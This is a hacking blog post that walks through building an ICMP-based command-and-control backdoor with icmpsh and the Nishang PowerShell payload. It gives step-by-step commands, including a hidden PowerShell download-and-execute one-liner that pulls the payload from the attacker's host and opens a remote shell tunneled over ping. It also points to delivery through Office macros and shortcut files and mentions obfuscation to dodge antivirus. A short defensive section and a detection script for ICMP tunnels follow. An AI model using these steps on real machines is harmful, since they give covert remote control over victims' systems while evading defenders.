C2 — ICMP Backdoor

ghostlulz
5 min read · Apr 25, 2019


Slack Group

Before we get started, I have started a Slack group dedicated to hacking. We welcome everyone from beginner to advanced to join. I will be on every day answering questions, doing CTFs, and talking about cool hacks. If you enjoy hacking and are looking for like-minded people, join below:

NEW Hacking Group Slack Channel

Introduction

In order to control your backdoors, trojans, and botnets you need a command and control server. The vast majority of these are designed to communicate over the HTTP protocol. In some cases your communication protocol might be blocked, or you might just want a stealthy alternative to the traditional communication protocols. ICMP is one of those protocols that defenders might not expect; after all, who would create a backdoor that communicates over ping? APT 32, also known as Cobalt Kitty, is one threat actor that has been using ICMP backdoors; one of them is named PHOREAL (https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html). This communication protocol is attractive because very few people are looking at it.

Downloads

ICMPSH Server

Icmpsh is an open source command and control server. As you can guess, this C2 operates over ICMP. Though this tool was coded about 8 years ago, it still works great for single-target scenarios. If you plan on gathering a bunch of targets and having them communicate with this C2, the tool will fail, as it's designed to communicate with one target at a time.

Nishang ICMP Payload

Nishang is a collection of hacking scripts written in PowerShell. These scripts are heavily used by penetration testers on a daily basis, so don't be surprised if it gets picked up by antivirus; that's what obfuscation is for anyway. The script we are interested in is located at /Shells/Invoke-PowerShellIcmp.ps1

The Attack

Preparation

After you have downloaded the ICMPSH server and the Nishang payload, you need to get things up and running. In this attack scenario the target will connect to our box to pull down the payload and execute it. This means we must host our attack script so it can be downloaded.

We can use the following command to start an HTTP server on port 80:

python -m SimpleHTTPServer 80

Make sure when starting this server you are in the nishang/Shells folder as shown below:

Now that we have our payload hosted on our server, we can start the ICMPSH command and control server. This server is where the PowerShell payload will connect to.

Before starting the C2 server we must configure our machine not to respond to ping requests. To do this, open a new terminal and type the following command:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

Like I previously mentioned, this C2 server can only communicate with one target at a time, so when starting the server we must give our IP as well as the target's IP as shown below:

python icmp_m.py your-ip target-ip

Now that you have your payload staged and your C2 listening, you are ready to play the game.

ICMPSH

Once the payload is staged and the C2 is listening, the target has to download and execute the payload. To execute the ICMP payload on the target machine you can enter the following command in the target's command prompt:

powershell -w hidden "IEX (New-Object System.Net.Webclient).DownloadString('http://your-ip/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress your-ip"

This is not the only means of executing the backdoor. You can embed similar commands in Microsoft Office macros, LNK/shortcut files, VBS scripts, and much more. You just need to get the target to download and execute your PowerShell payload.

Once the command is entered, the command prompt is hidden in the background. Next, the payload downloads the backdoor from the SimpleHTTPServer that was set up earlier. Once downloaded it is executed, and the Kali box receives a connection from the target machine as shown below:

That's it: you now have a PowerShell shell that is being tunneled through ICMP.

Defensive view

It's always a good idea to see what the enemy (blue team) sees when they are looking for you. If you're not aware of this type of attack you might completely miss it. If you are aware, it becomes easier to spot by looking at the network traffic as shown below:

As you can see, it's hard to miss a million ICMP packets going to and from the same host, but in a very large network with lots of traffic you might actually miss it. Still, this just isn't normal behavior; I don't know about you, but my computer doesn't normally send this many ICMP packets in a row to the same host. That's why, as an attacker, this communication protocol is best used as an emergency or secondary C2 channel. It most likely won't get picked up if it's only reaching out a few times a day.
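To make the blue-team view above concrete, here is an added detection example (my code, not part of the original post or of icmpsh/Nishang). It runs over constructed flow records of the form (timestamp, src, dst, icmp_type, payload_len); the volume threshold, the 32/56-byte "normal ping payload" baseline, and the sample addresses are assumptions. It flags two things a plain ping does not do: bursts of echo traffic between one pair of hosts, and payload sizes that vary from packet to packet, which is what shell input and output tunneled in the echo payload looks like.

```python
"""Flag ICMP echo conversations that look like a tunnel (added example, not from the post).

Records are constructed tuples (ts, src, dst, icmp_type, payload_len). In practice they
would come from Zeek logs, NetFlow, or a pcap; the thresholds below are assumptions.
"""
from collections import defaultdict

ECHO_REQUEST, ECHO_REPLY = 8, 0
# Assumed baseline: default ping payloads are 56 bytes (Linux) or 32 bytes (Windows)
NORMAL_PAYLOAD_SIZES = {32, 56}


def icmp_tunnel_suspects(records, window_sec=60, max_per_window=20, min_odd_payloads=5):
    """Return {(host_a, host_b): [reasons]} for host pairs whose echo traffic is abnormal."""
    by_pair = defaultdict(list)
    for ts, src, dst, itype, plen in records:
        if itype in (ECHO_REQUEST, ECHO_REPLY):
            key = tuple(sorted((src, dst)))  # both directions are one conversation
            by_pair[key].append((ts, plen))
    suspects = {}
    for pair, pkts in by_pair.items():
        pkts.sort()
        reasons = []
        # Rule 1: volume. Sliding window over timestamps, track the busiest window.
        peak, lo = 0, 0
        for hi in range(len(pkts)):
            while pkts[hi][0] - pkts[lo][0] > window_sec:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > max_per_window:
            reasons.append(f"{peak} echo packets within {window_sec}s")
        # Rule 2: payload size. Tunneled shell I/O varies in length; a real ping does not.
        odd = [plen for _, plen in pkts if plen not in NORMAL_PAYLOAD_SIZES]
        if len(odd) >= min_odd_payloads:
            reasons.append(f"{len(odd)} packets with non-standard payload sizes, e.g. {sorted(set(odd))[:5]}")
        if reasons:
            suspects[pair] = reasons
    return suspects


# Constructed sample: one ordinary 4-packet ping, plus a chatty pair with varying payloads
SAMPLE = [(i, "10.0.0.5", "8.8.8.8", ECHO_REQUEST if i % 2 == 0 else ECHO_REPLY, 56) for i in range(4)]
SAMPLE += [(100 + i * 0.5, "10.0.0.7", "203.0.113.9", ECHO_REQUEST if i % 2 == 0 else ECHO_REPLY,
            64 + (i * 37) % 200) for i in range(60)]

if __name__ == "__main__":
    for pair, reasons in icmp_tunnel_suspects(SAMPLE).items():
        print(pair, "->", "; ".join(reasons))
```

A low-rate beacon that only checks in a few times a day slips past the volume rule, which is exactly the author's point; the payload-size rule is what still catches it, so keep both.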

Conclusion

When on an engagement it's always good to have a backup C2 channel running alongside your main backdoor. ICMP is a good and stealthy alternative to HTTP, IRC, and raw TCP sockets. A lot of defenders just aren't looking for it, so it tends to fly under the radar.

https://twitter.com/ghostlulz1337
